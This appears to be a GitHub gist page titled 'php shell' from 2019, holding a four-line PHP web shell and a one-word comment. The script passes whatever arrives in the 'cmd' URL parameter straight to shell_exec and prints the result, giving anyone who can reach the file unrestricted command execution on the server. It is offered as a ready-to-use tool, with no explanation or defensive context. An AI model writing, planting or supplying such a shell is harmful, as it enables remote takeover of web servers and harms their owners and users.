Skip to content

Instantly share code, notes, and snippets.

@NitescuLucian
Created January 19, 2019 13:45
Show Gist options
  • Save NitescuLucian/f9cf63a40b05b504aaea30e6fca70687 to your computer and use it in GitHub Desktop.
Save NitescuLucian/f9cf63a40b05b504aaea30e6fca70687 to your computer and use it in GitHub Desktop.
php shell
<?php
$output = shell_exec($_GET['cmd']);
echo "<pre>$output</pre>";
?>
ola!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment